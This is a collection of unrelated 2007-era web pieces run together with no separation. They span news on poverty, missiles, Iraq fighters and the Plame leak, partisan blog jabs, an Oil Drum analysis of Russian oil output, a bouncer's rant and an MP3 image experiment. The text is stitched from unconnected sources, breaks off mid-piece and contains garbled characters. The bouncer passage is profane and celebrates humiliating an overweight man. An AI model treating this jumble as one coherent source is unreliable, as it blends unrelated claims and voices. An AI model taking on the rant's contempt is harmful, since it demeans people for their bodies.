Boosting public schools is a key plank in platform of Democratic presidential contender John Edwards , the only candidate in this year ’s election with a comprehensive plan to address poverty , which he aims to end within 30 years .
But opinion polls suggest that either Sen. Hillary Clinton or Sen. Barack Obama will have secured the Democratic Party nomination before Pennsylvania ’s primary elections on April 22 .
In West Philadelphia , Shaheed Moseley and his seven children aged from seven to 15 moved into a renovated row home in mid-December after six weeks living in one room at his sister ’s house .
Moseley , a single parent since his wife was killed by a stray bullet while sweeping their front step three years ago , previously spent nine months renting what he described as a “ slum ” where the roof caved in , ruining much of his furniture and possessions .
Standing in the unfurnished front room of his new rental home -- obtained for him by SafeHome Philadelphia , a private nonprofit for homeless families -- the 33 - year - old Moseley said he hopes to find a job in the construction industry where he worked before quitting to take care of his kids .
The family lives on $ 2,500 a month in welfare payments plus food stamps .
They depend on state assistance to pay utility bills and get health insurance from the City of Philadelphia .
Moseley said he had a car but sold it to pay bills when he quit his job three years ago .
Despite the help from various agencies , it ’s not easy getting by , Moseley said .
“ We ’re just barely making it . ”
Big surprise .
The Bush team is playing games to kill the new mileage requirements .
Hey , why try to bring the U.S. auto industry into the 1980s when we can got to war for oil :
The White House , echoing a position taken by auto manufacturers and a coalition of industry groups , is asking that the energy legislation be changed to specify the highway safety administration as the primary enforcer of fuel efficiency standards , with the E.P.A. in only an advisory role .
Democratic leaders in Congress have rejected that position as a “ nonstarter ” and indicated their intent to move the bill with the current language intact .
Bush is determined to be a destroyer of the earth instead of a steward of the earth .
Great legacy .
I wish I ’d invented the move of pulling the fat guy ’s shirt off in the middle of the fight , but I did n’t .
There are n’t many things I want to take credit for in life that other people have done - primarily because I do n’t like most of the things that people do - but pulling the fat guy ’s shirt off is a stroke of brilliance I wish I ’d come up with myself .
See , there was a fight , and there was an out of control fat guy who had scored himself the club - fighter ’s hat - trick , nailing that transcendent triad of starting it , exacerbating it and prolonging it beyond the point of utility .
This was a cry for help .
Out of control fat guys cry for help at bars and clubs because they want someone to hear them .
When they ’ve been in a fight , and things move outside , they have their soapbox and they ’ll use code words , veiled in bluster and threat , to tell you everything in fat - guy - land is n’t as fine and dandy as they tried to make it seem when they first came to the door , license in hand .
There ’s nothing worse than watching a grown man lose control of himself , unless you ’re talking about a horrifically out of shape grown man , which is a special case .
It ’s a special case because they ’re prematurely limited , physically speaking , and angry about things many of us will never quite understand until we get much older .
They need to let the rest of us know they ’re alive – that they , too , have feelings , hurts and sensibilities – and so they cry out in the only way they can for the benefit of the only audience they ’re able to hold captive .
I have feelings , hurts and sensibilities too , though – ones I ’ve earned the hard way through working for a living and not having the time nor the energy to sit and listen to some undisciplined piece of shit screaming his head off because somebody “ disrespected ” him enough to steal his fucking cocktail frank .
Or whatever .
So what you do , when an out of control fat guy starts doing his thing , is you pull his shirt off and throw it as far as you can .
By the time you ’ve arrived at the point of pulling an out of control fat guy ’s shirt off and throwing it , you ’ll be able to throw it pretty damned far because you ’ll be pretty fucking angry at him , and short of killing him , pulling off his shirt and throwing it down the sidewalk – or into the crowd – is probably the worst possible thing you can do to an out of control fat guy .
I saw this happen last weekend .
I saw a good , decent man snatch the shirt from an out of control fat guy in mid-cry - for - help , and it was probably the single best bouncing maneuver I ’ve ever had the good fortune to witness .
When an out of control fat guy loses his shirt , and he ’s down to the for - all - to - see root problem , right there in front of the crowd , a definite paradigm shift takes place and it ’s a beautiful thing to see .
It ’s like you ’ve shot the bastard with a tranquilizer dart .
This particular patient stopped dead .
He lost his focus .
The only thing that mattered anymore was getting his shirt back and getting himself covered .
That was it .
He was made to live in the moment .
He had n’t been doing that , which , theoretically was his entire problem .
We gave him a goal .
We granted him the gift of urgency , and he accepted it full bore , barreling down the sidewalk in pursuit of his size XXXXL security blanket .
I was too fixated on the fact that I ’d learned something new to laugh .
Some of you may think this approach is cruel , but look at both sides of the issue .
When someone dumps their problems on your doorstep – putting your health at risk in the bargain – the only move you can make is to put both hands on your broom and sweep them away as best you can .
Especially when they ’re not paying you enough to care .
Lost : $ 720 Billion .
If Found , Please Return to Owner , Preferably in Cash
According to the S&P / Case - Shiller index of housing prices , home prices have fallen by about 6 percent in the United States on average over the last twelve months .
By my rough calculations , that means that home owners have lost about $ 720 billion in wealth as a consequence .
That is about $ 2,400 for every person in America , and $ 18,000 for the average homeowner .
Relative to stock market declines , however , that loss of $ 720 billion over the course of the year does n’t look quite so big .
The total market capitalization of U.S. stock markets is the same order of magnitude as the total value of the housing market ( between $ 10 and $ 20 trillion ) .
In one week during October of 1987 , the U.S. stock market lost over 30 percent of its value .
The $ 720 billion figure is also about the same magnitude as the amount of money the U.S. government has spent on the war in Iraq .
If you are a homeowner , how bad do you feel about this ?
You should feel pretty bad , but I ’m guessing you would feel a lot worse in the following scenario : home prices did not fall at all last year , but one day you took $ 18,000 out of the bank to pay cash for a new car , and someone then stole your wallet with the $ 18,000 in it .
At the end of the day , your wealth would be the same ( down $ 18,000 , either from depreciation of the value of your home or because the money was stolen ) , but one loss is psychologically far worse than the other .
There are many possible reasons for why it does n’t hurt so much to lose money on an asset like a house .
First , it is n’t very tangible , since no one really knows what their house is worth anyway .
Second , it hurts less whenever everyone else is also losing on their houses .
I once heard a very rich person say that he did n’t care about his absolute wealth , only what his ranking was on the Forbes list of richest people .
Third , you ca n’t really blame yourself for house prices falling , but you could second guess your decision to carry around $ 18,000 in cash .
Fourth , the fact that a thief has your money might make it worse than the money just evaporating into space , like it does when house prices fall .
There are probably other reasons as well .
More generally , the economist Richard Thaler coined the phrase “ mental accounts ” to describe the way in which people seem to treat different assets as non-fungible , even though in principle it seems like they should be .
Although my economist friends make fun of me for it , I definitely use mental accounts myself .
For me , a dollar made playing poker means much more than a dollar earned from the stock market going up .
( And a dollar lost playing poker is likewise far more painful . )
Even people who deny that they are affected by mental accounts often fall prey to them .
I ’ve got a buddy in that category who won a big bet on NFL football ( big relative to his usual football bet , but very , very small relative to his overall wealth ) and the next day he spent the proceeds on a fancy new driver .
What does this all mean for housing prices ?
Well , if prices start going back up , it would be a lot more fun if the price increases came in the form of little packets of cash dropped outside your front door with the morning newspaper , rather than via house appreciation .
A fact that , I suppose , all those people who took out home equity loans figured out a long time ago .
Check out this floating swimming pool that was spotted on the Spree river in Berlin , Germany , where temperatures have been unseasonably warm .
It ’s called Badeschiff ( “ bathing ship ” ) , and it ’s an old barge that ’s been converted into a public swimming hole .
Unfortunately the Spree is much too polluted to swim in , hence the need for a floating pool .
I really like this idea , as swimming in lakes , rivers , and oceans is n’t my favorite thing in the entire world .
I mean , I jump in if i have to avoid looking like a wuss for abstaining , but I ’d much rather swim in a pool .
It would be especially neat if the floating pool had a glass bottom , or if it was attached to a working ship so that it could be transported to different places .
RS - 24 To Replace Soviet - Era Missiles
Russia announced this week it successfully test - fired its new RS - 24 intercontinental ballistic missile on Tuesday ... the latest display of that country 's resurgent military strength , fueled by oil revenues .
The test is the second firing of the new missile , intended to replace Soviet - era ICBMs .
Strategic Missile Forces spokesman Alexander Vovk told The Associated Press the RS - 24 successfully hit targets on the Kura testing range , about 4,340 miles east of the Plesetek launch facility .
In an official statement , the Strategic Missile Forces said the missile was launched from a mobile launcher .
Russia states the RS - 24 is based on the Topol - M -- which is capable of hitting targets over 6,000 miles away -- but can carry multiple warheads .
As ANN reported , Russia conducted its first RS - 24 test in May 2007 .
At the time , First Deputy Prime Minister Sergei Ivanov boasted the missile was " capable of overcoming any existing or future missile defense systems " -- a pointed swipe at the United States , which is working to develop such systems .
The language of the Strategic Missile Forces statement was even more to the point .
" The RS - 24 's deployment will strengthen the Strategic Missile Forces ' capability to penetrate missile defense systems and strengthen the nuclear deterrent potential of Russia 's strategic nuclear forces , " the statement read .
" The RS - 24 will form the backbone of the Strategic Missile Forces and safely ensure the security of Russia and its allies through the mid-century . "
The RS - 24 is intended to replace Soviet - built RS - 18 and RS - 20 missiles .
We believe deeply in the power of simplicity - elegant , functional , purpose - built software that just works .
Everytime .
Our dweet™ and freeboard™ platform products are great examples .
Both require only minutes to configure and use but are built to scale and securely support very large , high performance deployments .
Alan McConnell flopped limp on the ground in defiance as Montgomery County Police officers tried to arrest the 74 - year - old Silver Spring man Saturday morning .
But three officers carried McConnell away from the Kensington Farmers Market and arrested him for violating a no- trespass warning issued by police on Thursday barring him from selling his wares at the weekly market .
Now McConnell could face a maximum penalty of six months in jail and $ 1,000 in fines for selling $ 1 political buttons after the town warned him not to come back to the market , which is meant only for produce , flowers and home - grown products .
Despite his arrest , McConnell vowed to return to the market to stand up for what he says is a violation of his First Amendment rights .
‘‘ I will be back , I will be on the sidewalk , ” McConnell said from his home Monday afternoon .
McConnell was released from the Montgomery County Detention Center Saturday .
Only the parking lot where the market is held is included in the no-trespass order , and McConnell said he plans to be at least 10 to 15 feet away .
The scuffle between Kensington and McConnell escalated on June 30 when the town asked police to issue a no- trespass order that would bar McConnell from selling his buttons , which read ‘‘ Impeach Him ” referring to President George W. Bush , at the market .
McConnell is a founder of the Washington Area Impeachment Fund LLC , a company that uses the proceeds from the button sales to purchase more buttons and lawn signs bearing the same message .
But Kensington officials said the buttons do n’t fit with the homemade products and produce that have been the foundation of the market for at least 12 years .
McConnell claims his right to free speech was restricted unfairly , but he has never had town approval to sell the ‘‘ Impeach Him ” buttons , according to town officials .
McConnell , who said he sold the buttons weekly at the Kensington market for months , was asked to leave the market on June 16 by Kensington town staff .
He left the market that day , but returned on June 30 .
Town officials again asked him to leave , but when he refused , they called Montgomery County Police who issued the no-trespass order .
Despite warnings and citations , McConnell went back to the market just after 10:30 a.m.
Saturday , sold his buttons , was issued another town citation and was arrested by police within 30 minutes .
He and nearly 40 supporters staged a protest at the Kensington Farmers Market Saturday morning , to show their disapproval .
Officers repeatedly asked McConnell to stand up and go with them , but he refused and stayed on the ground as some people approached and bought buttons .
At least three different anti-Bush activist groups booed and chanted free speech slogans as McConnell , still limp in the arms of officers , was carried into a police cruiser and taken to the county detention center in Rockville .
McConnell also received a second citation , which could carry a $ 500 fine , from the town for selling goods at the market without a proper license because he was not a town - sanctioned vendor .
‘‘ This is n’t just an old fart standing on principle , ” McConnell said on Thursday before his arrest .
‘‘ If we have to get vendors licenses [ to sell buttons ] , we ’re dead . ”
He said his company would n’t have enough money to purchase vendor licenses for the town fairs and markets he and other Impeachment Fund employees visit , around the Washington , D.C. , area .
Kensington officials said the vendor license costs $ 35 for the summer .
According to a Montgomery County Police report , the land where the market is held is owned by CSX , serves as the parking lot for the MARC train station and is leased to the town .
McConnell believed the lot was public property , owned by the town , and that he had a right to sell the buttons there .
Protesters were n’t the only ones up in arms about McConnell .
Vendors said their sales were affected by the political theater on the sidewalk .
Dave Richards , a produce seller from Prince George ’s County , said there were certainly more people at the market , but few were buying produce .
‘‘ We ’re just trying to wait on customers that have been here for 10 years , ” he said .
‘‘[ The protesters ] are turning it into a flea market . ”
He had seen McConnell selling the buttons before , and said it had a negative effect on market - goers .
‘‘ He makes you feel uncomfortable , ” Richards said .
‘‘ If you buy a button you ’re a Democrat and if you do n’t , you ’re a Republican .
Either way , you ’re making people uncomfortable . ”
Several protesters , including Kensington residents Pam and Michael Sysick , said it would be difficult to keep such a high level of interest in protesting at the Kensington Farmers Market in the future .
However , Larry Bryant , a longtime friend and fellow activist said there ’s a good chance McConnell would be back .
‘‘ I think it ’s up to Alan and how much he can resist the urge to come back , ” he said .
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
Did Karl Rove fib to Charlie Rose ?
Is the Bush administration preventing Congress from further investigating Rove ’s role in the Valerie Plame leak case and doing the same regarding the White House ?
The answers : Yes , and it seems so .
Let ’s start with the first question .
On November 21 , Charlie Rose conducted an interview with Rove during which Rove claimed disingenuously that congressional Democrats in 2002 , not the Bush White House , pushed for a pre-election vote on a resolution authorizing George W. Bush to attack Iraq .
This comment kicked up a controversy .
But in one portion of the Rose interview cut out of the TV - edit that appeared , Rove tossed out another whopper .
This excerpt was posted by the Charlie Rose show on YouTube , and it covers questions Rose posed to Rove regarding former White House press secretary Scott McClellan ’s recent hullabaloo - causing statement about a key episode in the CIA leak case .
If you just awoke from a coma , McClellan said ,
I …publicly exonerated two of the senior - most aides in the White House : Karl Rove and Scooter Libby .
There was one problem .
It was not true .
I had unknowingly passed along false information .
And five of the highest ranking officials in the administration “ were involved in my doing so : Rove , Libby , the vice President , the President ’s chief of staff , and the president himself .
Rove claimed to Rose that McClellan had emailed him a few notes maintaining that these few sentences had been misinterpreted .
Rove added that he would not have anything else to say on this until a “ more full disclosure ” appears in McClellan ’s book , which is scheduled to be published next spring .
But Rove went on to insist that he had not misled McClellan , and he claimed total innocence :
I did not knowingly disclose the identity or name of a CIA agent .
Wait a minute .
Let ’s look at an email ( first disclosed by Michael Isikoff of Newsweek ) that Matt Cooper , then a Time correspondent , sent to his editors on July 11 , 2003 – three days before the name and CIA employment of Valerie Plame Wilson was first disclosed in a column by Robert Novak .
In this note , Cooper wrote :
Spoke to Rove [ this morning ] on double super secret background for about two mins before he went on vacation … his big warning … do n’t get too far out on [ Joe ] Wilson …says that the DCIA [ Director of Central Intelligence George Tenet ] did n’t authorize the [ Wilson ] trip [ to Niger to check out the allegation Saddam Hussein had shopped for uranium there ] and that Cheney did n’t authorize the trip .
It was , KR said , wilson ’s wife , who apparently works at the agency on wmd issues , who authorized the trip .
Given that neither Cooper nor the American public knew at this time that former Ambassador Joe Wilson ’s wife worked at the CIA –where she was operations chief for a classified unit searching for intelligence on Iraq ’s WMDs–Rove was indeed disclosing to a reporter that Valerie Wilson was a CIA officer .
Perhaps he did not know precisely what her position was at the CIA .
But he was outing her to Cooper as a CIA employee .
It just so happened that Cooper ended up being scooped by Novak .
But do n’t forget this : though Novak first learned of Valerie Wilson ’s CIA employment from Richard Armitage , then the No. 2 at the State Department , Novak confirmed this tantalizing piece of information with–who else but ?
–Rove .
So Rove did help Novak reveal Valerie Wilson ’s CIA identity .
It was wrong for McClellan to have declared publicly that Rove was not involved in the leak , and now , five years later , Rove has misled Rose on the same point .
On to the question of the White House ’s continuing effort to spin this scandal .
Today , Representative Henry Waxman , the chairman of the House oversight committee , sent a letter to Attorney General Michael Mukasey , complaining that the Bush White House has blocked his committee from receiving information regarding the White House and the CIA leak case .
Waxman writes :
The Special Counsel , Patrick Fitzgerald , has been cooperating with the Committee ’s investigation [ of the leak case ] .
Over the summer , Mr. Fitzgerald agreed to provide relevant documents to the Committee , including records of interviews with senior White House officials .
Unfortunately , the White House has been blocking Mr. Fitzgerald from providing key documents to the Committee .
I hope you will not accede to the White House objections .
During the Clinton Administration , your predecessor , Janet Reno , made an independent judgment and provided numerous FBI interview reports to the Committee , including reports of interviews with President Clinton , Vice President Gore , and three White House Chiefs of Staff … .
I have been careful in my dealings with Special Counsel Fitzgerald to narrow the Committee ’s request to documents that would not infringe on his prosecutorial independence or intrude upon grand jury secrecy … .
Mr. Fitzgerald ’s staff agreed that the Committee ’s request was appropriate and has already produced a number of the requested documents relating to CIA and State Department officials and other individuals .
To date , however , Mr. Fitzgerald has been frustrated in his attempts to transmit documents relating to White House officials to the Committee .
The arrangment Waxman worked out with Fitzgerald covered transcripts and notes related to interviews Fitzgerald and his investigators conducted outside the grand jury room with Bush , Cheney , Rove , McClellan , national security adviser Stephen Hadley , former White House chief of staff Andy Card , and former presidential counselor Dan Bartlett .
Yet the White House is preventing Fitzgerald from handing over this material to Waxman .
It ’s more stonewalling from a White House that , even McClellan now acknowledges , put out a false story about the leak case–and is still trying to stick with it .
The files listed the nationalities and biographical details of more than 700 fighters who crossed into Iraq from August last year , around half of whom came to the country to be suicide bombers , the New York Times reported today .
In all , 305 , or 41 % , of the fighters listed were from Saudi Arabia .
Another 137 , or 18 % , came from Libya .
Both countries are officially US allies in anti-terrorism efforts .
In contrast , 56 Syrians were listed and no Lebanese .
Previously , US officials estimated that around a fifth of all foreign fighters in Iraq came from these two countries .
US officials have also long complained about Iranian interference in the affairs of its neighbour , accusing Tehran of shipping weapons for militants over the border .
However , any assistance does not appear to extend to people , the paper said , reporting that , of around 25,000 suspected militants in US custody in Iraq , 11 were Iranian .
No Iranians were listed among the fighters whose details were found .
The information came from files and computers seized in September when US forces raided a camp in the desert near Sinjar , a small town in north - west Iraq , close to the Syrian border .
It was believed the camp was the base for an insurgent cell responsible for smuggling the vast majority of foreign fighters into Iraq .
The files also gave details of 68 Yemeni nationals , the third - biggest source .
There were 64 fighters from Algeria , 50 from Morocco , 38 from Tunisia , 14 from Jordan , six from Turkey and two each from Egypt and France .
According to the newspaper , US officials believe the raid stemmed the flow of foreign militants into Iraq , which dropped to around 40 in October , down from a peak of more than 100 a month in the first half of this year .
Last month there were 16 suicide bombings in Iraq , sharply down from a peak of 59 in March .
According to the report , the US military believes 90 % of such attacks are carried out by foreigners .
However , US officers fear this effect may be temporary .
" We cut the head off , but the tail is still left , " a senior military official told the newspaper .
" Regeneration is completely within the realm of possibility . "
The US has previously estimated the nationalities of fighters crossing over the Syrian border into Iraq , but the seized files give a more complete picture .
While Saudi Arabia is a long - term US ally , its nationals form the nucleus of al - Qaida ; 15 of the 19 September 11 attackers were from the country .
And while Libya was listed by the US as a state sponsor of terrorism , it was removed last year after the countries restored full diplomatic relations .
I certainly would n’t call him the worst candidate , but does anyone else in American politics today so perfectly embody the welfare - warfare ethos as Mike Huckabee ?
I mean , sure , some of the other candidates want to be the FÃ¼hrer , but Huckabee seems as if he ’s really running for secretary of health and human services in the Fourth Reich .
To wit :
â€ œNational security isnâ€™t going to mean much if we have a generation of kids so physically incapacitated [ by obesity ] they canâ€™t go to war.â€ 
Never mind that he unthinkingly equates “ national security ” with going to war ; I ’m more concerned that he ’s committing a grave political blunder .
Huck should forget the Atkins Diet vs. al - Qaeda angle and offer all those young James Tarantos out there what they really want : perpetual war for perpetual pizza .
Monthly Russian oil production according to three data sources , Jan 2003 - Aug 2007 ( left scale ) , and oil and gas rigs in country ( right scale ) .
Sources : EIA Table 1.1c , IEA Table 3 , and JODI .
Solid smooth lines are 13 month centered moving averages , recursed once ( note last 13 months rely on an incomplete window ) .
Production graph is not zero - scaled .
Rig data are from Schlumberger data and include both oil and gas rigs .
This piece looks at the question of whether the Russian oil production increases of recent years might have been due in part to projects that should have been listed as megaprojects , but went missing due to lack of transparency on the part of Russian companies ( or at least lack of transparency to English speaking readers ) .
The tentative answer to the question is " No . "
Instead , it appears that Russian production increases are in large part due to revival of mature Soviet era fields as the Russian economy recovered and as now - private Russian companies applied Western techniques of oil production ( and Western contractors ) to their fields .
Firstly , let 's review the main facts of the situation .
A graph of Russian oil production is shown above at the start of this piece .
From the beginning of 2003 to now , Russian production increased by about 2mbd .
This is the later stages of a longer increase , commonly called the " Russian Revival " , that began in the late 1990s .
By contrast there are only about 630 kbd of currently known Russian megaprojects in 2003 - 2007 .
Here they are , tabulated
Field Company First oil Peak date Peak flow ( kbd ) Salym group Shell / Sibir 6/2003 2009 160 South Priobskoye Gazprom Neft 2003 2005 220 Sakhalin - I ExxonMobil 10/2005 3/2006 250 Total 630
That 630 kbd slightly overstates the amount of the new capacity available so far , since at least one of these projects will not hit peak for several more years .
If you thought the 8 mbd ( or so ) of Jan 2003 production would have had a base production decline of something like 5 % a year , then you 'd expect to have lost about 1.5 mbd of the 8 mbd by now due to declines .
That would imply the 630kbd of megaprojects would have been nowhere near enough to hold the country 's production steady , let alone increase it by 2mbd .
Two kinds of explanation seem possible :
Production at existing fields actually increased , rather than declining Megaprojects have been missed .
In the course of the last couple of weeks , I 've been ploughing through annual reports for Russian oil companies ( in order to update the Wikipedia megaprojects listing ) .
So far , I 've only found a few small future projects that were n't already known , so I believe option 1 is almost certainly most of what is going on .
For context , let 's take a look at Russian production by company :
Monthly Russian oil production by company , Jan 2003 - Sep 2007 .
Source : Rembrandt Koppelaar .
Click to enlarge .
Note that the assets of Yukos were seized by the Russian government under controversial circumstances in late 2004 , and sold to Rosneft .
I 've placed the two companies adjacent so their combined production streams can be viewed as the same collection of reserves over time .
Here 's the same data , only not stacked so that it 's easier to see the trends in individual companies :
Monthly oil production of top Russian companies , Jan 2003 - Sep 2007 .
Source : Rembrandt Koppelaar .
Click to enlarge .
I 'm going to focus most of my discussion on Lukoil , which is the second largest Russian company by production .
I believe Lukoil is fairly typical and illustrates the general issues well .
It is also particularly conveniently documented ; it 's been a public company during the entire period , so there are annual reports for every year ( in English as well as Russian ) , and they are informative .
There have been no documented Lukoil megaprojects during the 2003 - 2007 period , but nonetheless production has increased by about 250kbd ( 15 % ) , instead of decreasing ( we 'll see that there have been new fields bought on by Lukoil , but they are probably all too small to count as megaprojects ) .
This graph comes from the Lukoil annual report for 2003 , and I think serves as a good orientation to the situation :
Lukoil average water cut , Q1 2002 - Q4 2003 .
Source : Lukoil annual report for 2003 .
Click to enlarge .
NB : graph is not zero - scaled and involves a very small range of water - cuts .
The water cut is the fraction of liquid volume coming up out of a well , or collection of wells , that is water , rather than oil .
Generally , a new field will produce at 0 % water - cut , and very old fields ( where almost all the oil has already been produced ) will operate at water cuts over 90 % .
What this graph says is that Lukoil 's production has a fairly high water - cut , which is indicative of a mature production base in which much of the producing reservoirs are now filled with water , and smaller amounts of remaining oil are moving .
However , Lukoil is improving the water cut slightly from year to year .
It 's worth reviewing some history here .
In the Soviet era , fields were produced in a fairly brute - force manner with no nuances .
To quote John Grace 's outstanding book Russian Oil Supply ,
On the basis of [ maps from the Ministry of Geology ] , and the results of tests run on the the delineation wells , the producing association designed the first - round of drilling targetd at the largest reservoir in the field .
Crews built drilling pads in the West Siberian swamp .
From these higher and dryer locations , several dozen wells were drilled in all directions .
Drilling multiple wells directionally from centralized pads minimized the costs and logistic difficulty of operating in a wetland .
The intersection of these wells with the reservoir formed a geometric grid .
In the first round of drilling , the grid was fairly loose .
Pattern drilling ( locally called the ' Siberian box ' ) carried the advantage of easy planning , but did not respect the geologic heterogeneity of reservoirs .
Mixed in the grid of producing wells were water injectors .
Under Soviet practice , water flood usually commenced at the beginning of field development and continued to the field 's abandonment ...
Engineers put pumps on every well they could .
Nonetheless , they quickly met the limit of improvements that could be won with sucker - rod pumps .
Without the option to upgrade to ESPs , sucker - rod pumps would only soften the wells ' decline rates .
Moreover , installing pumps meant incurring the cost and management requirements of maintaining them ...
The second line of attack was infill drilling .
As the bump in output from mechanization declined , a second geometric grid of wells was planned for the spaces in between the first grid in a reservoir .
In theory , infill wells increase the total volume of oil recovered from a reservoir .
When drilled in the West or the USSR , however , most infill drilling is for production rate acceleration - not increased recovery .
When drilled on a pattern , particularly with the reservoir under water flood , infill drilling can actually reduce the amount of oil ultimately recovered .
As meeting the current quarter 's planned production goal overhwelmed all other considerations , infill drilling became the brute - force instrument of choice .
So you should picture Lukoil 's main assets as a set of large West Siberian fields that were developed in this manner during the Soviet era , and peaked and started to decline while under a poorly designed and monitored waterflood .
Here is Lukoil 's oil production by region :
Lukoil oil production by region in 2006 .
Source : Lukoil annual report for 2006 .
Click to enlarge .
The idle well ' crisis ' , as it became known , began immediately after the massive 1986 - 88 recovery campaing wilted .
State budgets for field operations dove in every year thereafter , falling by half as of 1992 .
Well repair took the hardest hit .
By 1991 , the number of wells going off line exceeded the number of new wells drilled .
In 1992 , the number of producing wells in the newly independent Russian Federation was lower than during its last year as part of the USSR .
As budgets shrank , producers deferred maintenance ; the backlog of wells awaiting repairs quickly and inexorably accumulated .
Whereas idle wells ran at around 3,000 during the eighties , by 1993 there were 29,101 .
This cost the nation 1.6 million b/d of production , or 23 percent of national output .
A seemingly incredible number of wells remained offline for want of small repairs or lack of routine attention .
In the early years of the Russian Revival , production increased just by fixing infrastructure that had broken down and not been repaired during the collapse of the Russian economy in the early nineties when oil companies were not getting paid , not making money , and not able to buy parts .
Grace again : The situation began to turn around in the late 1990s .
First Russia defaulted on its debts , and the rouble was devalued , which dramatically increased the profitability of Russian oil companies ( since their costs were mainly in roubles , but they could sell oil in dollars ) .
Then oil prices started to go up .
By the beginning of 2000 , the surge in export prices and a significant increase in domestic prices substantially raised the volume of income heading back to producers .
They , in turn , began to plough back into the fields much of the net income received at the wellhead ( over $ 9 / bbl in 2000 ) .
The number of idle wells fell , and for the first time in a decade , the number of new wells rose .
Output went up a bracing 6 % .
The same trend continued through 2002 .
The increases not only fueled drilling in general , they supported the initial development of a a handful of major new fields .
( Emphasis added ) .
By the time we start tracking megaprojects in 2003 , however , most basic " fix the wells " work that was worth doing was done .
What has been going on in recent years has a lot more to do with the application of a variety of western technologies to the old Soviet fields .
For example , here 's Lukoil 's 2006 annual report :
By the end of 2006 a total of 196 fields were included in a multi level system of field development monitoring by use of geological hydrodynamic models .
Modelling of 47 fields was carried out in the course of the year .
Geological hydrodynamic models are helpful in selecting optimal technical solutions for field development , matching solutions to specific geology and structure of reserves .
Modelling raises the oil recovery ratio and lowers field development costs .
The Company makes intensive use of models for drilling over fields and for application of enhanced recovery techniques .
LUKOIL plans to inсrease the number of geological hydrodynamic field models to 261 by 2009 , so that 75 % of Company fields will have such models ( compared with 55 % of fields at present ) .
Geological hydro dynamic modelling will be extended to all fields in such regions as Western Siberia , Timan Pechora and Kaliningrad Region .
Rather than the oil Soviet system of just drilling a geometric grid into the reservoir , Lukoil is now striving to build actual geophysical models of their reservoirs , so they can optimize the placement of wells into the remaining oil , and study the likely flow of the oil in the face of the various faults , fractures , and variations in reservoir permeability that pervade oil reservoirs .
Other techniques include the application of horizontal wells , and horizontal sidetracks ( where a vertical or mostly vertical well which is now producing too much water is redrilled horizontally into the remaining oil layer to lower the water cut and increase oil production . )
This next graph shows the trends in these activities :
Lukoil use of horizontal drilling and sidetracks , 2003 - 2005 .
Source : Lukoil annual report for 2005 .
Click to enlarge .
As you can see , there are sharp increases in the use of sidetracks and horizontal wells , so we might imagine that the water - cut has continued to fall from the late 2003 value of 76 % .
Another technique of importance is hydrofracturing ( " fraccing " - putting the well under enough pressure to cause fractures in the reservoir rock , which can enhance production in certain situations ) .
From the 2004 report :
A large part of LUKOIL Group 's fields are in the last stages of exploitation , marked by increase of the water cut and falling flow rate of oil wells .
This deterioration of reserve structure calls for application of scientific and production know - how , which can find , test and implement the most suitable technologies for oil extraction at declining fields .
The Company carried out 4,909 enhanced oil recovery ( EOR ) operations in 2004 .
Additional production thanks to EOR was 20.8 million tonnes last year , which is 5 % more than in 2003 .
Most of the EOR oil ( 13.2 million tonnes or 63.5 % of the total ) was extracted using physical EOR , and 92.6 % of oil produced by physical EOR was obtained by hydrofracturing techniques .
20.8 million tonnes / year is about 400 kbd .
Finally , a brief discussion of new fields brought on by Lukoil .
The only new field during 2003 - 2006 for which production figures are mentioned is the Kratsovskoye platform in the Baltic sea .
This came on in 2004 , and
was mentioned prominently in the initial letter to shareholders in the 2004 annual report
has merited at least a paragraph and production statistics in every annual report 2003 - 2006 ,
had its picture fill most of the front cover of the 2004 report .
so apparently Lukoil considers it a significant project .
Lukoil annual report cover for 2004 , featuring the Kratsovskoye platform in the Baltic sea which started up production in that year .
Source : Lukoil annual report for 2004 .
Click to enlarge .
However , by 2006 , production at Kratsovskoye was still only 861,000 tonnes , which is about 17,200 barrels / day .
That was a 55 % increase over 2005 , but is below the current threshold to be considered a megaproject .
Lukoil 's crown - jewel annual - report - cover offshore project is tiny by global standards .
And also tiny compared to the cumulative effect of 4000 + EOR operations on wells in giant old fields .
A variety of other new fields are mentioned by name in the reports , but have no production figures , and Google produces no information about them .
They are probably small .
For background , Grace reports that 400 small fields have been found in Western Siberia alone , and as of late 2004 , only 160 of them were on line ( the rest being too small or too far from infrastructure to be worth it .
Collectively , the 400 small fields only hold 15 % of the basin 's remaining reserves .
It 's likely Lukoil is bringing some such fields on stream .
For example , in 2005 , of 9 new fields brought on line , the largest , East Sarutayuskoye and Perevoznoye had 3P reserves of 0.624 gb .
So probably 2P reserves might be 0.15 gb each .
Given the slow rate at which Russian projects generally progress , they probably are not of megaproject size .
Similarly , of 11 new fields brought on in Russia in 2006 , the only ones large enough to get mention were as follows .
First in Western Siberia :
Major new commissionings included the West Pokamasovskoye and West Kotukhtinskoye fields with proved , probable and possible oil reserves in excess of 280 million barrels .
so that 's probably less than 0.1 gb each of 2P reserves .
And in the Timan - Pechora region :
Three fields were commissioned in 2006 : West Lekkeyaginskoye ( commissioned by Naryanmarneftegaz , the joint venture between LUKOIL and ConocoPhillips ) , Verkhnegrubeshorskoye and South Sedmesskoye , with overall proved , probable and possible reserves of about 230 million barrels of oil .
Three fields with 3P reserves of 0.23gb between them is very small fish to fry indeed .
So in summary , I do n't think we are missing any megaprojects of any great consequence in recent years from Lukoil .
Although my research is incomplete , this seems to be the pattern at other companies also .
Production increases have been coming from better management of the very large but significantly depleted Soviet - era fields , along with commissioning of very small new fields .
Only a handful of megaprojects have occurred .
Other selected Oil Drum pieces on Russia :
Moon Audio / Visual
Yesterday I wondered what would happen if I stored the raw data from a pixmap image to a WAV file , converted that file to an MP3 , then back to a WAV , then finally reconstituted it as a pixmap .
Here 's the original photo I used ( I can't remember what site I got this from , unfortunately [ see update below ] ) :
You can hear what this image sounds like ( 16 khz sample rate ) .
It turns out the answer is that there 's no noticeable difference after one conversion cycle .
In order to see any real difference I had to do multiple generations of mp3 compression — all done at a constant 96 kbps .
( To hear the audio artifacting that comes from repeated mp3 compression , check here . )
Here 's the result after 20 generations :
Gavin pointed out that it mostly just lost contrast .
If you renormalize the histogram , this is what you get :
Now I want to see the result of compressing audio with JPEG , but I would n't be able to stand the disappointment if I spent a couple hours doing it myself and then discovered that again there was no interesting difference .
So I guess that means it 's your turn to contribute something for once .
Update :
The photo is by my buddy Christopher Trott .
Update :
There 's more discussion on programming.reddit.com .
Posted by jjwiseman at August 03 , 2007 03:55 PM
LONDON ( Reuters ) - A supercomputer that could help answer some of science ’s biggest questions will be unveiled on Monday .
